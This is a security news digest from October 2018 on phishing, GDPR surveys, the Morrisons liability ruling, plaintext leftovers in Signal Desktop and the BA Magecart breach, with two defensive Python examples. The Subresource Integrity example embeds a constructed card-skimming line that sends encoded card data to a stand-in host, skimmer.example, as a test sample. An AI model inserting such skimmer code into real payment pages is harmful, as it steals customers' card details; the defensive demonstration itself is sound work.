FFT news digest Oct 26 2018

Top phish

New research suggests the key threat to businesses in the US is phishing (where criminals try to fool us into handing over credentials for services or networks). The 2018 U.S. State of Cybercrime Survey found that the biggest issues were caused by employees who fell for scams, and by mixing work and personal use of devices and services. Separate research by an email security provider offers a list of the most targeted brands. At the top are Microsoft, PayPal and Netflix. And Business Insider reports on a current scam that tries to obtain Apple ID credentials by asking users to review a Spotify subscription. These scams are becoming more professional, and more targeted. Training is part of the answer, and it comes down to a simple message: if it involves something important, never click on a link in the message or phone a number it gives you; go to the service directly instead.

Bugging Trump

Researchers have been scratching their heads over a New York Times report claiming Russia and China are listening to President Trump's personal cellphone calls. According to unnamed officials, calls "are intercepted as they travel through the cell towers, cables and switches that make up national and international cellphone networks." The Times report provides almost no details to substantiate its claims (which President Trump has rejected on Twitter). But it is well known that cellular networks offer little protection against a well-resourced interceptor: the signalling protocols (SS7) that route calls between carriers were designed on the assumption that every participating network can be trusted, and calls are protected, at best, only between the handset and the tower. Our advice is that sensitive conversations (with confidential sources, for example) are best held over an app that encrypts the content end to end, such as Signal. In President Trump's case, even if his official iPhones are secure, the call is only as private as the other end of it, and it would be relatively easy to target the private recipients of his calls.

GDPR non-compliance

Five months after enforcement of the new European data protection regulation began, a survey has found most businesses are not fully compliant. According to the report from the International Association of Privacy Professionals (IAPP), "More than half the respondents (56%) subject to GDPR say they are far from compliance or will never comply." And 1 in 5 organisations that took part said they believed full compliance was impossible. Given the complexity of the GDPR, such figures are not surprising. Any organisation claiming complete compliance would be well advised to consider the grounds for its statement. As we've set out previously, the key to complying with the GDPR is to ensure data protection is built into the fabric of an organisation. To that end, nearly half the businesses surveyed by the IAPP said they had appointed a Data Protection Officer (DPO) even though they weren't required to. They said the role served "a valuable function". We have a longer article looking at the issues around DPOs and EU Representatives - and who needs one.

Morrisons ruling

UK supermarket group Morrisons has lost its challenge to a High Court ruling that it is liable for the actions of a disgruntled employee who leaked the company's entire payroll. The case involves a claim for compensation by more than 5,000 of the staff who were affected. It's the first class action in the UK involving a leak of personal data, and the ruling stands despite the rogue employee having been given an eight-year prison sentence for his actions. Morrisons had argued that it could not be held liable for the criminal misuse of its data, but the ruling suggests companies will have to meet a high standard if such an argument is to be accepted. In particular, it's likely that companies will be required to demonstrate that stringent controls are in place to protect personal data, including restrictions on removable storage and monitoring of what data is being accessed, by whom, and when. Morrisons told the BBC that it had acted responsibly, and says it will appeal to the Supreme Court.

Signal on the desktop

We are firm supporters of the Signal communication app, and use it ourselves, but it's important to be aware of issues with the desktop version. This week security researcher Matt Suiche noticed a problem with the process of migrating from Signal's Chrome Extension to Signal Desktop. The upshot was that the user's messages were exported to plaintext files on disk, and those files remained there even after the migration was complete. It's not the first time issues have arisen with the way data is stored by the desktop versions of messaging apps like Signal. In most cases these versions are add-ons created later for convenience, and they inherit the desktop's weaker protection of data at rest. Another researcher warned about disappearing messages (which are designed to delete themselves automatically after a set period): attached media files remain intact, and unencrypted, even after the message itself disappears. We're not suggesting this is a reason not to use Signal, but it is important to be aware of these issues in the event a laptop were to be searched.
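The practical concern in both cases is data that an application, or a one-off migration, has left on disk unencrypted. As an added example (not Signal's code), the Python below walks an application data directory and flags files that look like plaintext rather than an encrypted store, using the byte entropy of each file's contents. The directory layout, file names and sample messages are constructed for the demonstration, and the 6.0 bits-per-byte threshold is a heuristic.

```python
"""Flag plaintext leftovers in an application's data directory.

Added example (not Signal's code). The directory layout and sample files
below are constructed; the 6.0 bits/byte threshold is a heuristic.
"""
import json
import math
import os
import tempfile
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: ~8 for encrypted or compressed data, ~4-5 for text."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(path: str, sample_size: int = 65536) -> str:
    """Classify one file from its first sample_size bytes."""
    with open(path, "rb") as f:
        data = f.read(sample_size)
    if not data:
        return "empty"
    # Text contains no NUL bytes and has a skewed byte distribution; ciphertext
    # has a flat distribution (high entropy) and, in practice, NUL bytes too.
    if b"\x00" not in data and shannon_entropy(data) < 6.0:
        return "plaintext"
    return "encrypted-or-compressed"


def scan(root: str) -> dict:
    """Walk root and return {relative_path: classification} with '/' separators."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            results[rel] = classify(full)
    return results


def build_sample_dir() -> str:
    """Constructed sample: a plaintext message export next to an encrypted store."""
    root = tempfile.mkdtemp(prefix="appdata-")
    os.makedirs(os.path.join(root, "export"))
    messages = [{"from": "alice", "body": "call me on the other number"}] * 50
    with open(os.path.join(root, "export", "messages.json"), "w") as f:
        json.dump(messages, f)
    with open(os.path.join(root, "db.sqlite.enc"), "wb") as f:
        f.write(os.urandom(4096))  # stands in for an encrypted database
    return root


if __name__ == "__main__":
    root = build_sample_dir()
    for rel, kind in sorted(scan(root).items()):
        print(f"{kind:24} {rel}")
```

Point scan() at the real profile directory rather than the constructed one. Compressed files (images, archives) also score as high entropy, so a clean result is triage, not proof; a "plaintext" hit in a directory that should hold only an encrypted database is the thing to investigate and securely delete.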

BA data breach

BA says it's notifying a further 185,000 people that their personal details may have been stolen in this year's data breach. In a press release, BA said details of 77,000 payment cards could have been compromised, including card numbers, expiry dates and card verification values (CVV). For the other 108,000 the CVV was not taken. The newly affected customers made reward bookings using a payment card between 21 April and 28 July 2018. BA says it is concluding its internal investigation, but has provided no details of what lay behind the breach. Researchers believe a group known as Magecart was responsible for a series of attacks, including the one on BA. Magecart is the name given to criminal groups that inject card-skimming JavaScript into checkout pages, so the card details are copied out of the customer's browser as they are typed rather than taken from the merchant's servers. One of the questions BA will have to answer is why the scripts running on its payment pages were not locked down and isolated, for example with Content Security Policy and Subresource Integrity, in a way that would have defeated the attack.
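As an added example (not BA's code), the Python below shows the two browser-enforced controls mentioned above: Subresource Integrity pinning of a checkout-page script to the exact bytes that were reviewed, and a Content Security Policy whose connect-src directive denies an injected skimmer anywhere to send the card data. The hostnames, script bodies and the injected exfiltration line are constructed for the demonstration.

```python
"""Pin checkout-page scripts with Subresource Integrity and constrain the page with CSP.

Added example (not BA's code). Hostnames, script bodies and the injected
skimmer line are constructed for the demonstration.
"""
import base64
import hashlib

SRI_ALGOS = ("sha256", "sha384", "sha512")


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Integrity attribute value for a script body, e.g. 'sha384-<base64 digest>'."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"SRI permits only {SRI_ALGOS}, not {algo!r}")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(body: bytes, integrity: str) -> bool:
    """Emulate the browser check: the attribute may carry several tokens; any
    token with a supported algorithm that matches the body passes, tokens with
    unsupported algorithms are ignored, and a changed body matches nothing."""
    for token in integrity.split():
        algo = token.split("-", 1)[0]
        if algo in SRI_ALGOS and sri_hash(body, algo) == token:
            return True
    return False


def script_tag(src: str, body: bytes) -> str:
    """Script element pinned to the exact bytes reviewed at build time."""
    return (f'<script src="{src}" integrity="{sri_hash(body)}" '
            f'crossorigin="anonymous"></script>')


# Constructed CSP for a payment page: scripts only from our own origin and one
# CDN, and the browser may only open connections to the payment processor.
# connect-src is what denies an injected skimmer its exfiltration channel.
PAYMENT_PAGE_CSP = (
    "default-src 'self'; "
    "script-src 'self' https://cdn.example.com; "
    "connect-src 'self' https://payments.example.com; "
    "form-action 'self'; "
    "frame-ancestors 'none'"
)

# Constructed script bodies: the reviewed original and a skimmer-injected copy.
ORIGINAL = b"window.pay = function (card) { return post('/charge', card); };\n"
TAMPERED = ORIGINAL + (
    b"window.pay = function (card) { fetch('https://skimmer.example/c?d=' + "
    b"btoa(JSON.stringify(card))); return post('/charge', card); };\n"
)

if __name__ == "__main__":
    print(script_tag("https://cdn.example.com/pay.js", ORIGINAL))
    print("Content-Security-Policy:", PAYMENT_PAGE_CSP)
    pinned = sri_hash(ORIGINAL)
    print("original loads:", sri_matches(ORIGINAL, pinned))   # True
    print("tampered loads:", sri_matches(TAMPERED, pinned))   # False
```

SRI only helps for scripts the page itself pins, so it defeats a modified third-party or CDN-hosted script but not one served from a compromised first-party server that also serves the page. The CSP connect-src restriction still applies in that case: a skimmer that cannot reach its collection server has nothing to show for the compromise, and the blocked request appears in the browser's CSP violation reports.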

In brief

The risks of dodgy websites. The US Geological Survey's computer network was infected with malicious software. Government auditors traced the infection back to a single employee who had used his work computer to view pornography websites.

How much is your time worth? Under a proposed settlement, US users affected by the Yahoo data breach can claim $25 an hour for time spent dealing with the fallout from the biggest security breach yet seen. Yahoo has agreed to pay $50 million into a compensation fund, and bear the cost of credit monitoring services.

Out-of-date WordPress installations are a serious security risk, so much so that WordPress has committed itself to "wiping older versions from existence on the internet".

Forbes reports that Apple has managed to defeat the GrayKey security tool which is widely used by law enforcement to crack iPhones. Meanwhile, the UK's National Cyber Security Centre has released guidance for organisations which have issued iOS 12 devices to users.

Malaysian researchers have found a way to send smells over the internet. It involves converting a digital message into electrical current and using it to stimulate the recipient's neurons. It also involves inserting electrodes (far) up the nostrils. The idea might need some work.

Updates

Cisco: update to address a vulnerability in the update service of the Cisco Webex Meetings Desktop App for Windows which could allow an authenticated, local attacker to execute arbitrary commands as a privileged user.

Mozilla: Firefox 63 includes a new capability designed to prevent users being tracked across separate websites. It's based on a new cookie policy which aims to defeat third-party tracking tools while minimising the breakage sometimes caused by wholesale blocking of cookies.

Media players: Make sure you're using the latest version of media players like VLC and MPlayer, which are among those affected by a serious vulnerability in the LIVE555 streaming media library they both use.

SecureDrop: Version 0.10.0 includes an update of the OSSEC monitoring software. The developers warn of a possible installation failure in some circumstances.

Tails: Version 3.10.1 fixes a number of significant security vulnerabilities.

Address

152-160 City Road
London, EC1V 2NX

Contacts
Email: info@fullframetech.com
Phone: +44 (0) 20 3290 2205
Support: +44 (0) 20 3290 2207

Company registration no. 10243217